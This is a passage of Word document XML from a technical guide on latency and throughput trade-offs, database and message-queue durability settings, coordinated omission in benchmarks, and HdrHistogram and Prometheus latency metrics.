      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Batching (discussed above):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Waiting to fill a batch increases throughput but increases latency proportionally to batch fill time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C297D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compression:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Compressing data before network transmission increases effective bandwidth (throughput) but adds compression CPU time (latency). For large payloads over slow links, compression wins. For small payloads over fast links, compression adds latency with negligible throughput benefit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146FBE6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection pooling and multiplexing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> HTTP/2 multiplexes multiple requests over one TCP connection. This increases throughput (fewer TCP connections, better bandwidth utilization) but can increase p99 latency if one slow stream's data blocks other streams (application-level head-of-line blocking). HTTP/3/QUIC solves this with per-stream independence but adds its own overheads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3A91A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Async I/O patterns:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Issuing multiple concurrent I/O operations increases throughput (I/O bandwidth fully utilized) but individual operations may wait for others to complete — increased median latency, reduced throughput variance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F1969F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When Optimizing for Latency Hurts Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2C1008" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Waiting for each operation to complete before starting the next minimizes individual request latency (no queuing) but limits throughput to 1/latency (no parallelism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786FB435" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eager flushing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Calling fsync() after every write ensures durability (and minimizes the latency of confirming durability) but dramatically reduces disk write throughput (fsync serializes writes, preventing batching).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70614305" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Small buffer sizes:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Small buffers flush more frequently (lower latency per buffered write) but generate more I/O operations per byte written (lower throughput). Large buffers batch more writes (higher throughput) but data sits in buffer longer (higher latency for individual writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E551B10" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The explicit latency-throughput dial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC2595" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Many systems expose explicit controls for this trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A86C4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50EB89" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Kafka producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468F1EA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  acks=1, linger.ms=0:   low latency (don't wait for batch), low throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69155D52" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  acks=all, linger.ms=5: higher latency (wait for replication + batch), higher throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9FF48" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="5BB36DF5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E3323" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  synchronous_commit=on:    every COMMIT waits for WAL flush (low latency for confirming write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C851B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  synchronous_commit=off:   COMMIT returns before WAL flush (lower write latency, higher throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B29E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A3A5F6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Redis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0122B1CD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  appendfsync=always:  every write flushed to disk (durable, high latency, low write throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BBA60" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  appendfsync=everysec: flush every second (1s durability window, balanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9B17D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  appendfsync=no:      OS decides when to flush (lowest latency, highest throughput, poor durability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351B1218" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="696D29C2">
          <v:rect id="_x0000_i5201" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A91E062" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Measuring Latency Correctly — The Tooling and Pitfalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7959FC3F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Coordinated Omission Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2EE544" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The most important measurement pitfall in systems benchmarking</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t>, identified by Gil Tene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E1639" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Standard benchmarking tools measure response time of requests that were actually sent. But when a system is overloaded and requests queue, the benchmark's "think time" (time between requests) is consumed by the previous request's latency. Slow responses cause fewer requests to be sent per second — and the slow period is never measured because no new requests were sent during it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63479592" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C41EE76" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Scenario: benchmark sends one request at a time, measures response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1865F857" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Target throughput: 100 RPS → one request every 10ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF4E26C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="3F9F0148" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Normal operation: response = 5ms → next request sent at 10ms → hit rate maintained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200FBE6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  measured latency: 5ms ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACC911B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="64E77786" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Overload event: GC pause causes 1 second of high latency for one request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE12ACB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → that request takes 1,010ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3382CA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → next request sent at 1,020ms (10ms after the slow response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D5F71" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → 100 requests that should have arrived during the 1-second GC pause were never sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B346A6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA048D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Benchmark reports: p99 = 5ms, one outlier at 1,010ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D828C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Reality: 100 users who would have arrived during the GC pause experienced 1-second latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05E8DC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         The benchmark measured only 1% of the impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C31C02" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7D165BA1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Coordinated omission: the benchmark "coordinated" with the system by not sending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC626B3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>requests during its slow period, artificially omitting those latency measurements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C77A92" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fix — HdrHistogram and Coordinated Omission Correction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5E8D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Use benchmarking tools that account for coordinated omission (wrk2, JMH with -bm thrpt, Gatling). These tools schedule requests at a fixed rate regardless of whether previous requests have completed. When a request is late (previous request still in flight), the pending request is recorded as having waited from its scheduled time — capturing the full queuing latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB2439D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8D120" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Corrected measurement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB9277" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1 request takes 1,010ms (GC pause)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448EB0E7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  100 requests were scheduled during that second but couldn't be sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125674F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → 100 requests recorded with latency 1,000ms, 990ms, 980ms... (accumulated wait)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F90FEE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E4C2DA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Corrected p99: reflects the true user experience of the GC pause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13F12E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Benchmark report: p99 = 1,000ms (accurate) instead of 5ms (misleading)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E181CDF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HdrHistogram — Accurate Latency Distribution Recording</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E186276" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Standard statistics (mean, standard deviation) are insufficient for latency distributions — they're dominated by the common case and hide the tail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388645B3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HdrHistogram (High Dynamic Range Histogram):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122CAF2F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>A histogram that can record values across a wide dynamic range (nanoseconds to hours) with configurable precision, using memory proportional to the number of significant digits tracked rather than the range:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574958AB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB739C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEF933" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  highest_trackable_value: 3,600,000,000 (1 hour in microseconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDABE9E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  significant_value_digits: 3 (0.1% precision)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF89DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE8D4A7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Memory: ~400KB regardless of number of recorded values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B32DDB1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">         (no per-sample storage — only bucket counts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F8CAA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27744CE5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6BFB0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  histogram.getValueAtPercentile(50)   → p50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E49C42" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  histogram.getValueAtPercentile(99)   → p99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B30DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  histogram.getValueAtPercentile(99.9) → p999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9EAAE3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  histogram.getMean()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E9210" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  histogram.getStdDeviation()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10067A95" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HdrHistogram is used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> wrk2, JMH, Dropwizard Metrics, Prometheus' histogram (approximate), HDR histograms in HBase, Cassandra, and many high-performance systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639968E3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Prometheus histogram vs summary trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F59C69A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224B846" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Prometheus Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BDFCFE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Records pre-configured percentiles (p50, p95, p99) at collection time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F7284" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Pro: exact percentiles, no aggregation error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F9256B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Con: percentiles cannot be aggregated across instances or time windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281D5044" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">       (you can't average p99 values from 10 instances to get system-wide p99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D04BE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="2DCB9DCE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Prometheus Histogram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7771A4D3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Records bucket counts (how many observations fell in each bucket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD2D4F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Pro: can be aggregated (sum bucket counts across instances)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235016E1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">       system-wide percentiles accurately computed from aggregated buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A6DC9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Con: percentile accuracy depends on bucket boundaries</w:t>
      </w:r>
    </w:p>
